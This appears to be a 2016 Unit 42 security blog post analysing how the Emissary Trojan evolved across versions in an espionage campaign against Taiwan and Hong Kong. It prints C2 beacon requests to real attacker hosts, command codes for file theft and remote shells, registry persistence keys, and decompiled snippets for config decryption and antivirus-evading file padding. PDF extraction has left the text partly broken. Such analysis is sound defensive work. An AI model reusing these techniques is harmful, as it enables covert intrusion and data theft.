### MENU **[Blog Home > Malware > Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to](http://researchcenter.paloaltonetworks.com/)** **Evolve?** # Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve? **[By Robert Falcone and Jen Miller-Osborn](http://researchcenter.paloaltonetworks.com/author/robert-falcone/)** **February 3, 2016 at 11:00 AM** **[Category: Malware, Threat Prevention, Unit 42](http://researchcenter.paloaltonetworks.com/malware-2/)** **203** **161** **[In December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary](http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/)** **[Trojan as a payload. Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/)** **campaign, which prompted us to start collecting additional samples of Emissary.** **The oldest sample we found was created in 2009, indicating this tool has been in use for almost** **seven years. Of note, this is three years earlier than the oldest Elise sample we have found,** **suggesting this group has been active longer than previously documented. In addition, Emissary** **appears to only be used against Taiwanese or Hong Kong based targets, all of the decoys are** **written in Traditional Chinese, and they use themes related to the government or military.** **We also found several different versions of Emissary that had several iterative changes that show�** **how the Trojan evolved over the years. One of the most interesting observations made during this** **analysis is that the amount of development effort devoted to Emissary significantly increased after�** **[we published our Operation Lotus Blossom report in June 2015, resulting in many new versions of](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/)** **the Emissary Trojan. In addition, we observed a TTP shift post publication with regards to their** **malware delivery; they started using compromised but legitimate domains to serve their malware.** **Interestingly, the C2 infrastructure is also somewhat different than that used by Elise.�** ## Targeting **In contrast to Elise, which was used in attacks against multiple Southeast Asian countries in region** **appropriate languages, all of the Emissary decoys we’ve collected are written in Traditional Chinese,** **which is used primarily in Taiwan and Hong Kong. The targets we have identified are also limited to�** **those two regions. Despite appearing to target a more limited geographical range, Emissary** **targeted the government, higher education, and high tech companies with a mix of copy and pasted** **news articles and documents that do not appear to be available online. Decoys include:** **An Excel spreadsheet containing legitimate contact information for much of the Taiwanese** **government that does not appear to be available online.** ----- **Taiwan scholar saying the odds of China and Taiwan reuniting is low and discussing the issues** **with an attempted military takeover.** **Copy of a news article from 2010 about the Chinese League of Victims protesting the** **involuntary removal of Shanghai residents in the lead up to the Shanghai Expo.** **Copy of the official Taiwan holiday schedule for 2016, which is the 105� anniversary of theth** **current Taiwanese government.** **Figure 1: Partial screenshot of the response from Deputy Commander of the Nanjing Military Region** **Wang Huangguang.** ## Evolve to Survive: TTP Shifts and Infrastructure **We’ve expanded our knowledge of Emissary infrastructure significantly since our first Emissary blog�** **and we’ve found almost exclusive use of Dynamic DNS (DDNS) domains with only one purchased** **from a Chinese reseller. In contrast, the Elise samples used a mix of actor-registered and DDNS,** **with the actor-registered serving as one of the data points we used to tie all of the activity together.** **While the use of DDNS can make tying activity together more difficult, and despite the new�** **Emissary variants since our publication, two of the most recent C2s resolved to IPs used by Elise** **C2s detailed in Operation Lotus Blossom. The Emissary samples typically have three hardcoded** **C2s that are a mix of IPs and domain names, with one of the domains or IPs not being used by the** **other three C2s in a likely effort to avoid loss of control. A full IOC list is included at the end of this�** **report.** **Also new is the actors’ use of compromised legitimate Taiwanese websites to serve their malware,** **including the official website of the Democratic Progressive Party. This is particularly interesting as�** **Taiwan just held a closely watched Presidential election on 16 January where DPP candidate Tsai** **Ing-wen won. This marked the first time a woman was elected President of Taiwan and only the�** **second time a member of the Kuomintang did not hold the office since being ousted from China in�** **1949 when the Communist Party of China took power. In line with her party’s stance, she is widely** **seen as a proponent of an independent Taiwan and not in favor of reunification with the People’s�** ----- ## p **Our evidence suggests that malware authors created Emissary as early as 2009, which suggests** **that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years.** **The Emissary Trojan is a capable tool to gain a foothold on a targeted system. While it lacks more** **advanced functionality like screen capturing, it is still able to carry out most tasks desired by threat** **actors: exfiltration of files, ability to download and execute additional payloads, and gain remote�** **shell access. It appears that threat actors have continually used this Trojan, and developed several** **updated versions of Emissary to remain undetected and fresh over time.** **We analyzed all of the known Emissary samples to determine what changes the malware author** **made between the different versions of the Trojan. During our analysis, we examined when each�** **sample was created based on its compile time and produced a simple timeline, seen in Figure 2, to** **display the development efforts expended on the Emissary Trojan. It should be noted that we know�** **some Emissary samples have been used multiple times with different configurations, so the timeline�** **only shows when development activity took place on Emissary and should not be misconstrued to** **when Emissary was used in attacks.** **The timeline in Figure 2 shows that the Emissary Trojan was first created (version 1.0) in May 2009�** **and quickly received an update that resulted in version 1.1 in June 2009. The Trojan did not receive** **much in the form of updates until September 2011 when the author released version 2.0. Version 2.0** **received one update in October 2013 before the malware author released version 3.0 in December** **2014. The malware author released version 4.0 in March 2015, but curiously created a version 3.0** **sample afterwards on June 26, 2015, which was out-of-sequence from the incrementing versioning.** **Between August and November 2015 the malware author creates several new versions of Emissary,** **specifically 5.0, 5.1, 5.3 and 5.4 in a much more rapid succession compared to development�** **process in earlier versions.** ----- ----- **Figure 2: Timeline of development efforts spent on Emissary�** **The out-of-sequence version 3.0 appears to be an early variant of version 5.0 based on significant�** **similarities (discussed in the changelog section) that are not seen in the original version 3.0 and** **other earlier versions of Emissary. One campaign code associated with of the out-of-sequence** **version 3.0 sample was “3test”, suggesting the malware author created it for testing purposes. The** **other campaign code associated with the out-of-sequence sample was “IC00001”, which could** **denote an attack payload as it appears to be a plausible code to describe a campaign.** **While this may be coincidental, the out-of-sequence version 3.0 sample was created ten days after** **[we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely](http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/)** **related to Emissary. It is possible that the threat actors were prompted to make malware changes in** **response to our research. Regardless of causation, the rapid development of new versions of** **Emissary suggests that the malware authors are making frequent modifications to evade detection,�** **which as a corollary suggests the threat actors are actively using the Emissary Trojan as a payload** **in attacks.** ## Emissary Changelog **In this section, we discuss the changes observed between each version of Emissary. As this section** **is focused on changes, the features and functionality are the same between Emissary versions** **unless otherwise mentioned.** #### Version 1.0 **Date: 5/12/2009** ----- **Name: WUMsvc.dll** **Initial Release** **The initial loader Trojan writes Emissary to %SYSTEM%\WSPsvc.dll and installs it as a service,** **which will run the exported function “ServiceMain” within the Emissary Trojan to carry out its** **functionality.** **Configuration data is stored in the last 1024 bytes of the payload, from which the Trojan will extract�** **an 896 byte structure. The configuration is decrypted with an algorithm that uses the XOR operation�** **on each byte using the value at a different offset within the ciphertext.�** **The code will create the following registry keys:** **1** **2** **HKEY_CLASSES_ROOT\Shell.LocalServer\CheckCode** **HKEY_CLASSES_ROOT\Shell.LocalServer\CheckID** **Emissary uses the “CheckCode” registry key to store the encrypted configuration for the Trojan,�** **while it stores a GUID that Emissary uses to uniquely identify the compromised host in the** **“CheckID” key.** **The malware performs initial system information gathering and saves data to a file named�** **TMP2548. The initial gathering relies on a combination of the following commands executed by the** **command prompt:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **commands executed by the command prompt:** **ECHO VER** **VER** **ECHO IPCONFIG /ALL** **IPCONFIG /ALL** **ECHO NET LOCALGROUP ADMINISTRATORS** **NET LOCALGROUP ADMINISTRATORS** **ECHO NET START** **NET START** **ECHO GPRESULT /Z** **GPRESULT /Z** **ECHO GPRESULT /SCOPE COMPUTER /Z** **GPRESULT /SCOPE COMPUTER /Z** **ECHO SYSTEMINFO** **SYSTEMINFO** **Emissary parses command and control responses for “instru”, which will precede a GUID value that** **designates the command the C2 server wishes to execute on the system. The command handler** **does not use a nested if/else or switch statement like most malware families, instead Emissary** **creates a structure that contains all of the available command GUIDs that it will iterate through each** **time the C2 supplies a GUID in order to determine which command the operator wishes to execute.** **Emissary can include up to 32 different commands within this data structure, but it appears the�** **author has decided to include six commands within the Trojan. The following denotes the command** **handler structure used by Emissary v1.0:** ----- **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **CHAR** **guid[40];** **DWORD sub_function;** **DWORD arg1_subfunction;** **DWORD arg2_subfunction;** **DWORD arg3_subfunction;** **};** **struct** **commandHandler** **{** **DWORD number_of_commands;** **DWORD unused;** **struct** **EMISSARY_COMMAND cmd_0;** **struct** **EMISSARY_COMMAND cmd_1;** **struct** **EMISSARY_COMMAND cmd_2;** **struct** **EMISSARY_COMMAND cmd_3;** **struct** **EMISSARY_COMMAND cmd_4;** **struct** **EMISSARY_COMMAND cmd_5;** **};** **Table 1 contains the commands available within the Emissary v1.0 command handler.** **Command** **Description** **bac84b12-5b0b-491f-** **Upload file.�** **a885-8667d156394f** **3d8313cc-53ca-4751-bbbf-** **Download file.�** **ea5f914f8e65** **db0e93e7-b46c-4cba-** **Update config. C2 specifies files as: p1�** **81f1-ec70da57dc19** **= C2 server 1, p2 = C2 server 2, p3 =** **C2 server 3, p4 = Sleep Interval, p5 =** **System Identifier (computer name), p6�** **= GUID for beacon.** **2e382e51-3089-4293-** **Executes a specified command.�** **8454-5eccb253eb54** **a57db08a-bf97-4b43-** **Create remote shell.** **b27d-157e62e2fd74** **eab5c1ab-a497-4fc2-bbe0-** **Update Trojan with new executable.** **049be45d6f2d** **Table 1: Emissary command handler** **The Emissary version 1.0 beacon to the C2 server appears as follows:** |Command|Description| |---|---| |bac84b12-5b0b-491f- a885-8667d156394f|Upload file.�| |3d8313cc-53ca-4751-bbbf- ea5f914f8e65|Download file.�| |db0e93e7-b46c-4cba- 81f1-ec70da57dc19|Update config. C2 specifies files as: p1� = C2 server 1, p2 = C2 server 2, p3 = C2 server 3, p4 = Sleep Interval, p5 = System Identifier (computer name), p6� = GUID for beacon.| |2e382e51-3089-4293- 8454-5eccb253eb54|Executes a specified command.�| |a57db08a-bf97-4b43- b27d-157e62e2fd74|Create remote shell.| |eab5c1ab-a497-4fc2-bbe0- 049be45d6f2d|Update Trojan with new executable.| **1** **2** **3** **GET /VSNET/default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **Host: 193 34 144[ ]21** ----- **SHA256: e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30, Original** **Name: WUMsvc.dll** **Removed checks for “//” and “/” in the update configuration command when updating the three C2�** **servers.** #### Version 1.1 **Date: 6/5/2009** **SHA256: 931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb** **Original Name: WUMsvc.dll** **Bug fixes:�** **Added code to make sure the content received from the C2 server matches the “Content-** **Length” value in the HTTP response.** **Code added to allow for the download of more than 524,288 bytes.** **The Emissary v1.1 C2 beacon appears as follows, which has not changed since version 1.0:** **1** **2** **3** **4** **GET /eng/comfunc/comfunc/default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **Host: 137.189.145.1** **Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678;** **op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6** #### Version 2.0 **Date: 9/15/2011** **SHA256: 5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099 Original** **Name: EmissaryDll.dll** **Version 2.0 was a significant re-write of the Emissary Trojan.�** **The configuration data for the Trojan is still saved to the registry, but the registry key has changed�** **to:** **1** **SOFTWARE\Microsoft\VBA\VbaData** **The configuration structure also changed in size to 464 bytes. The Emissary configuration is now�** **encrypted using a custom algorithm that uses the “srand” function to seed the “rand” function using** **a value of 2563. This seed value causes the “rand” function to generate the same values each time,** **which Emissary will use as a key along with the XOR operation. The configuration now contains the�** **version number of Emissary, instead of the version being hardcoded into the Trojan.** **This version of Emissary keeps track of which C2 location within its configuration that it has been�** **communicating with by storing the index of the C2 server (1, 2, or 3) in the following registry key:** **1** **SOFTWARE\Microsoft\VBA\VbaList** **This version of Emissary moves away from the command handler using the structure and moves to** **a nested if/else statement for less complicated command handling; however, the command GUID** **and commands themselves are unchanged.** **The Emissary version 2.0 beacon changed slightly from previous versions, specifically the removal�** **of the User-Agent field and the use of a lowercase “h” in the “Host” field. The following is an�** **example of the version 2.0 beacon, which contains the same GUID and “op” values:** ----- **3** **Cookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678;** **op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6;** **Version 2.0 also introduces a debug message logging system that includes verbose error messages** **that are accompanied by an error ID number. Error messages are written to the file�** **%TEMP%\em.log. The following is a list of all possible debug messages:** ----- **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **19** **20** **21** **22** **23** **24** **25** **26** **27** **28** **29** **30** **31** **32** **33** **34** **35** **36** **37** **38** **39** **40** **41** **42** **43** **44** **45** **46** **47** **48** **49** **50** **51** **52** **53** **54** **55** **56** **57** **58** **59** **60** **61** **62** **63** **64** **emissarydll.cpp - 0x35 - InitApp() - Event create successful** **emissarydll.cpp - 0x3b - InitApp() - create work thread** **shell.cpp - 0x30 - SendShellOutputThread - PeekNamedPipe - Error : 0x%08x** **shell.cpp - 0x3e - SendShellOutputThread() : Timeout** **shell.cpp - 0x53 - SendShellOutputThread - ReadFile - Error : 0x%08x** **shell.cpp - 0x5b - SendShellOutputThread - send - Error : 0x%08x** **shell.cpp - 0x62 - SendShellOutputThread() : thread exit** **shell.cpp - 0x7f - RecvShellCmdThread - recv - Error : 0x%08x** **shell.cpp - 0x89 - RecvShellCmdThread - WriteFile - Error : 0x%08x** **shell.cpp - 0x8f - RecvShellCmdThread() : thread exit** **shell.cpp - 0xeb - Error occured : %s** **[%d]** **shell.cpp - 0xfa - TerminateThread Input Thread** **shell.cpp - 0x100 - TerminateThread Output Thread** **shell.cpp - 0x118 - SocketShell - Fail To** **Create Reverse Socket** **shell.cpp - 0x12f - SocketShell - Fail To** **Generate Reverse Shell** **shell.cpp - 0x13a - SocketShell - SocketShell - Fail To** **Generate Reverse Shell** **shell.cpp - 0x13e - SocketShell - Create Reverse Shell Thread OK** **config.cpp - 0x38 - RegCreateKeyEx error : %0x08x** **config.cpp - 0x46 - RegSetValueEx error : %0x08x** **config.cpp - 0x5e - ReadConfig - RegCreateKeyEx error : 0x%08x** **config.cpp - 0x66 - ReadConfig - RegQueryValueEx error : 0x%08x** **config.cpp - 0xab - find user: %s** **config.cpp - 0xbc - can not** **find proxy** **config.cpp - 0xc7 - get ProxySetting failed** **config.cpp - 0xd4 - find proxy server : %s** **run.cpp - 0x75 - InitConfig: [g_ServerPath:%s]** **[g_ServerName:%s]** **[g_port:%d]** **[g_ServerUrl:%** **run.cpp - 0x9d - InitConfig: [g_DelayTime:%d]** **run.cpp - 0xbe - get proxy the last time used:%s** **run.cpp - 0xc3 - server index:%d** **run.cpp - 0xd9 - RetryTimes = %d** **run.cpp - 0xec - connect %s** **error :%s** **run.cpp - 0x10c - process** **a** **request ok.** **httpclient.cpp - 0x98 - ASP.NET_SessionId⻓度[异常]:[%d][%s]** **(translation: ASP.NET_SessionId Length** **httpclient.cpp - 0xd0 - ******not** **connected !** **httpclient.cpp - 0xf4 - read hread error : %s** **httpclient.cpp - 0x102 - body length = 0** **httpclient.cpp - 0x13d - decrypt error"** **httpclient.cpp - 0x211 - instruction : ** **httpclient.cpp - 0x21d - no instruction guid** **httpclient.cpp - 0x22c - OP_DOWNLOAD no local file name** **httpclient.cpp - 0x23b - OP_UPLoad no local file name** **httpclient.cpp - 0x249 - OP_UPLoad no local file name** **httpclient.cpp - 0x242 - OP_UPLoad no local file name** **httpclient.cpp - 0x25b - OP_EXECUTE no cmd list** **httpclient.cpp - 0x262 - OP_EXECUTE no timeout** **httpclient.cpp - 0x2b4 - OP_SHELL ip** **httpclient.cpp - 0x2bb - OP_SHELL port** **httpclient.cpp - 0x2dd - OP_CHANGECONFIG server1** **httpclient.cpp - 0x2e4 - OP_CHANGECONFIG server2** **httpclient.cpp - 0x2eb - OP_CHANGECONFIG server3** **httpclient.cpp - 0x2f2 - OP_CHANGECONFIG timestr** **httpclient.cpp - 0x2f9 - OP_CHANGECONFIG namestr** **httpclient.cpp - 0x300 - OP_CHANGECONFIG guid** **httpclient.cpp - 0x321 - not** **connected** **httpclient.cpp - 0x361 - send msg error** **httpdoinstruction.cpp - 0x28 - DownloadFile - LocalFileName=%s** **httpdoinstruction.cpp - 0x5c - download file http head:%s** **httpdoinstruction.cpp - 0x7a - download file ok** **httpdoinstruction.cpp - 0xac - UploadFile - LocalFileName=%s** **httpdoinstruction.cpp - 0xb4 - DownloadFile - Error - Open File** **[%S][0x%08x]** **httpdoinstruction.cpp - 0xc7 - UploadFile:TotalLength=%d** **httpdoinstruction.cpp - 0x124 - download file http head:%s** **Date: 10/24/2013** **SHA256: 9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3** **Original Name: NetPigeon DLL dll** ----- **settings for the Emissary service, which the Trojan will store in and access from the following registry** **keys:** **SOFTWARE\Microsoft\VBA\Serv -> Service Name** **SOFTWARE\Microsoft\VBA\VbaList -> Binary Path for the Service** **Also, this version of Emissary was created using Microsoft Foundation Classes (MFC) to carry out a** **majority of its functionality. For instance, instead of manually building an HTTP request as in** **previous versions, this version uses the MFC functions to create the HTTP request and send it to** **the C2 server:** **CInternetSession::CInternetSession** **CInternetSession::GetHttpConnection** **CHttpConnection::OpenRequest** **CHttpFile::AddRequestHeaders** **CInternetSession::SetCookie** **CHttpFile::SendRequest** **Using these classes creates a significantly different HTTP request sent to the C2 server, but the�** **functionality of obtaining instructions from the C2 is the same. The following is an example of a** **beacon generated by this sample, which contains the same “op” value and has additional fields�** **within the HTTP header:** **1** **2** **3** **4** **5** **GET /lightserver/Default.aspx HTTP/1.0** **Cache-Control: no-cache** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: groupspace.findhere.org** **Cookie: guid=8E550BBD-F5DB-4471-BBC7-E8768BD5003E;** **op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6** **The logging functionality within this update no longer includes error ID values, but still contains** **verbose debug messages that are written to a file named %TEMP%\msmqinst.ax.�** #### Version 3.0 **Date: 12/24/2014** **SHA256: dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3�** **Original Name: Generic.dll** **Bug fixes:�** **Added a function to the configuration update command that checks to see if the C2 provided�** **a new sleep interval at offset 460 and uses the interval stored in the VbaData registry key if its�** **missing. This fixes the bug that would not allow the sleep interval to update correctly.�** #### Version 4.0 **Date: 3/26/2015** **SHA256: 5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58** **Original Name: Generic.dll** **This version of Emissary includes both the installation and loading functionality along with the** **Emissary functional code in the same file. The installation and loading portion of the Trojan is called�** **using an exported function named “Setting”, which moves the file to:�** ----- **installs Emissary as a service or as a standalone Trojan. To install as a service, the loader will** **enumerate the services on the system looking for services running under the “netsvcs” group, and it** **will attempt to hijack the first “netsvcs” service by replacing the “ServiceDLL” parameter to point to�** **the Emissary DLL. For instance, during the analysis period, the installation code changed the** **following registry key of the AppMgmt:** **1** **HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll: "%SystemRoot%\System32\appm** **to** **1** **HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll: "C:\DOCUME~1\ADMINI~1\LOCA** **If the user does not have permissions to add a service, the installation routine attempts to add** **persistence by creating the following registry key that will run the functional code within Emissary** **via an exported function named “DllRegister”:** **1** **Software\Microsoft\Windows\CurrentVersion\Run\Resolves: "Rundll32.exe C:\DOCUME~1\ADMINI~1\LOCAL** **This version of emissary has its configuration appended to the end of the DLL, specifically starting�** **at offset 0xc600. The following code accesses the configuration embedded within the DLL and�** **decrypts it using a single byte XOR algorithm using 65 as the key:** **1** **2** **3** **4** **5** **6** **SetFilePointer(v2,** **0xC600,** **0,** **0);** **ReadFile(h_emissary_dll_file,** **buffer_for_config,** **0x1D0u, &NumberOfBytesRead,** **0);** **iteration_count = 0;** **do** ***(iteration_count++ + buffer_for_config) += 65;** **while** **(** **iteration_count < 0x1D0** **);** **This algorithm differs from the algorithm introduced in Emissary version 2.0 that used the srand and�** **rand functions to generate a key to use in conjunction with the XOR operation. With the** **configuration embedded within the Emissary DLL, each Emissary version 4.0 sample will have a�** **different hash as the configuration data changes.�** **The network beacon sent from Emissary version 4.0 is the same as other previous versions starting** **at version 2.0, as seen in the following:** **1** **2** **3** **4** **5** **GET /lightserver/Default.aspx HTTP/1.0** **Cache-Control: no-cache** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: 210.209.121.92** **Cookie: guid=7DA53AE4-C155-40b3-8EB3-60C4FCE99025;** **op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6** #### Version 3.0: Out-of-sequence **Date: 6/25/2015** **SHA256: 70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a** **Original Name: IISDLL.dll** **Major Overhaul** **The compilation time of one sample of Emissary version 3.0 on June 25, 2015 appears out of order,** **as it occurs after the compilation of Emissary version 4.0. The differences between this out of order�** **sample compared to the other known version 3.0 sample, as well as version 4.0 for that matter,** **include a dramatic change in configuration storage and the handling of commands. Also, the files�** **stored on the system have different names than Emissary versions in the past, which are:�** ----- **3** **4** **5** **%APPDATA%\LocalData\75BD50EC.DAT -> Configuration** **file** **%APPDATA%\LocalData\A08E81B411.DAT -> Emissary DLL** **This version of Emissary is designed to be injected into an Internet Explorer process by its** **associated loader Trojan, which marks the first time Emissary executes through DLL injection.�** **This version of Emissary also has a different configuration structure than prior versions. The�** **configuration is no longer stored in the registry; rather it is saved to a file named 75BD50EC.DAT.�** **The Emissary DLL will skip to offset 0x488 within this file and read the next 132 bytes, which it will�** **decrypt with a new algorithm as seen in the following:** **1** **2** **3** **4** **5** **6** **7** **8** **SetFilePointer(h_config_file_1,** **0x488,** **0,** **0);** **ReadFile(h_config_file,** **buffer_for_config,** **132u, &NumberOfBytesRead,** **0);** **CloseHandle(h_config_file);** **srand(0xA03u);** **iteration_count = 0;** **do** ***(buffer_for_config + iteration_count++) ^= rand() % 128;** **while** **(** **iteration_count < 0x84** **);** **The configuration structure has also changed as well, with Emissary now using the following�** **structure:** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **struct** **emissary_new_config** **{** **WORD** **Emissary_version_major;** **WORD** **Emissary_version_minor;** **CHAR[36]** **GUID_for_sample;** **WORD** **Unknown1;** **CHAR[128]** **Server1;** **CHAR[128]** **Server2;** **CHAR[128]** **Server3;** **CHAR[128]** **CampaignName;** **CHAR[550]** **Unknown2;** **WORD** **Delay_interval_seconds;** **};** **This version of Emissary also introduced a new command handler that uses number-based** **commands instead of the GUID commands seen in prior versions of Emissary. The functionality of** **the commands are the same, however, the commands themselves are invoked using a number.** **Table 2 contains a list of available commands and a brief description of the functionality carried out** **by the command.** **Command** **Description** **102** **Upload a file to the C2 server.�** **103** **Executes a specified command.�** **104** **Download file from the C2 server.�** **105** **Update configuration file.�** **106** **Create a remote shell.** **107** **Updates the Trojan with a new executable.** |by the command.|Col2| |---|---| |Command|Description| |102|Upload a file to the C2 server.�| |103|Executes a specified command.�| |104|Download file from the C2 server.�| |105|Update configuration file.�| |106|Create a remote shell.| ----- **in Emissary version 2.0; however, the “op” value of “101” is hardcoded for the beacon and replaces** **the GUID based op designator to match the new command handler. The following is an example of** **the network beacon generated by this version of Emissary:** **1** **2** **3** **4** **5** **GET /default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: 101.55.33.92** **Cache-Control: no-cache** **Cookie: guid=cae5e213-395a-4023-9a12-f78d3c4718e5;** **op=101** #### Version 5.0 **Date: 8/25/2015** **SHA256: c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634, Original** **Name: WinDLL.dll** **Emissary version 5.0 closely resembles the out-of-order version 3.0 sample, which suggests that** **the malware author just forgot to change the version number of the out of order sample. While the** **configuration and Emissary DLL filenames used by the version 5.0 Emissary sample are the same as�** **the out-of-order version 3.0 sample, the log file name differs but only slightly, as seen in the�** **following list of related files:�** **1** **2** **3** **4** **5** **6** **7** **%TEMP%\000A758C8FEAE5F.TMP -> Log** **File** **%APPDATA%\LocalData\75BD50EC.DAT -> Configuration** **file** **%APPDATA%\LocalData\A08E81B411.DAT -> Emissary** **DLL** **%APPDATA%\LocalData\ishelp.dll -> Loader DLL** **Version 5.0 uses numbers within its command handler and the same configuration structure as the�** **out-of-order version 3.0. The only major change in 5.0 is the ability to obtain a compromised** **system’s external IP address by performing an HTTP GET request to “http://showip.net/index.php”.** **The code will parse the response from this webserver for the following to obtain the system’s IP** **address:** **1** **** **The SID value sent from the C2 server is encrypted using an algorithm that uses the XOR operation** **on the data using 0x76 as the key on the first byte and the resulting cleartext byte as the key on the�** **next byte and so on. The network beacon sent from this version of Emissary visually resembles the** **out-of-order version, with the addition of a field “SHO” that contains the IP address of the�** **compromised host. The following is an example of the Emissary version 5.0 network beacon, which** **is also the same in versions 5.1, 5.3 and 5.4 as well:** **1** **2** **3** **4** **5** **GET /default.aspx HTTP/1.1** **User-Agent: Mozilla/4.0** **(compatible;** **MSIE** **7.0;** **Windows NT** **5.1)** **Host: 101.55.33.95** **Cache-Control: no-cache** **Cookie: guid=8cdef38c-808a-4e29-af6e-7386f02d28f1;** **op=101;** **SHO=172.16.107.130** #### Version 5.1 **Date: 9/29/2015** **SHA256: 375190cc8e0e75cf771d66347ea2a04b6d1b59bf2f56823eb81270618f133e2d** **Original Name: WinDLL.dll** ----- **encrypted form and are decrypted using an algorithm that uses addition to each byte of ciphertext,** **using 65 (“A”) as a key. The obfuscated strings, as seen below, involve the filename of the log file�** **and the command prompt executable used to create the remote shell:** **1** **2** **\xEF\xEF\xEF\x00\xF6\xF4\xF7\x02\xF7\x05\x04\x00\x04\xF4\x05\xED\x13\x0C\x0F = 000A758C8FEAE5F.T** **\x22\x2C\x23\xED\x24\x37\x24 = cmd.exe** **Date: 10/14/2015** **SHA256: e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538�** **Original Name: WinDLL.dll** **In an attempt to avoid detection based on PE header hashes, version 5.1 was recompiled without** **making any changes.** #### Version 5.3 **Date: 11/7/2015** **SHA256: 29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051** **Original Name: WinDLL.dll** **Emissary 5.3 moved some code used to create the remote shell out of a sub-function in an attempt** **to evade signatures used to detect the remote shell creation. For instance, in Emissary 5.1 the** **command handler would call an initial subfunction that would then call a second subfunction to** **carry out the activities to create and interact with the remote shell. In 5.3, the command handler** **calls an initial subfunction that carries out the activities to create and interact with the remote shell.** #### Version 5.4 **Date: 11/23/2015** **SHA256: 69b1d5454abe2475257defd9962a24a92411212c4f592de8765369a97f26c037 (Base DLL** **with junk data removed)** **Original Name WinDLL.dll** **[Version 5.4 of Emissary was the basis for the blog “ELISE: Security Through Obesity” by Michael](http://pwc.blogs.com/cyber_security_updates/2015/12/elise-security-through-obesity.html)** **Yip of PWC. This blog provides a great analysis of this version of Emissary and we highly suggest** **reading it to become familiar with the Trojan.** **There is one difference in the functional code between Emissary versions 5.3 and 5.4, which�** **involves the removal of the command ‘107’ used to update the Trojan. The string ‘107’ still exists** **within the Trojan, however, the command handler does not check the C2 response for this** **command and the code used to update the Trojan has been removed.** **The major difference between Emissary version 5.4 and all previous versions is how the Trojan is�** **saved and loaded. First, the filenames of the various components of Emissary changed to the�** **following; however, the filename for debug logs has not changed:�** **1** **2** **3** **4** **5** **6** **7** **%APPDATA%\Programs\Syncmgr.dll -> Loader** **Trojan** **%APPDATA%\Programs\60HGBC00.DAT -> Configuration** **File** **%APPDATA%\Programs\WEB2013BW6.DAT -> Emissary** **Trojan** **%TEMP%\000A758C8FEAE5F.TMP -> Log file** ----- **The reason for creating such large files is to trick antivirus applications into not scanning the file, as�** **it could exceed the maximum size of files the antivirus can scan (even VirusTotal has a maximum file�** **size of 128MB). For instance, the following pseudo code contains two loops that will end up** **appending 524,288,000 bytes to the end of file, resulting in a DLL that exceeds 500MB in size:�** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18** **WriteFile(hFile,** **buf_EmissaryDllFromResource,** **nNumberOfBytesToWrite, &nNumberOfBytesToWrite,** **0)** **buf_junkData = 0;** **ret_time = time(0);** **srand(ret_time);** **for** **(** **i = 0;** **i < 51200; ++i** **)** **{** **for** **(** **j = 0;** **j < 640; ++j** **)** **{** **random_byte = rand() % 255;** **offset_in_buff_junkData = &buf_junkData + 16 * j;** **dword_junkData = 0x1010101 * random_byte;** ***offset_in_buff_junkData = dword_junkData;** ***(offset_in_buff_junkData + 1) = dword_junkData;** ***(offset_in_buff_junkData + 2) = dword_junkData;** ***(offset_in_buff_junkData + 3) = dword_junkData;** **}** **WriteFile(hFile, &buf_junkData,** **0x2800u, &nNumberOfBytesToWrite,** **0);** **}** **With the new filenames, malware persistence is achieved via the following registry key:�** **1** **HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Syncmgr: "rundll32.exe "C:\Documents and** **Sett** **Date: 11/24/2015** **SHA256: bfceccdd553c7e26006bb044ea6d87e597c7cce08218068e31dc940e9f55b636 (Base DLL** **with junk data removed)** **Original Name: WinDLL.dll** **In another attempt to avoid detection based on PE header hashes, the Trojan was recompiled** **without making any changes.** ## Conclusion **The actors using Emissary, who were previously reported as behind Operation Lotus Blossom, have** **been active for at least seven years in Southeast Asia. They are persistent, evolve over time, and** **have enough resources to have multiple custom RATs that receive regular updates. The targeting is** **largely military or government, with some cases of higher education and high tech companies. They** **also have the ability to select and use appropriate decoys in multiple Asian languages that appear** 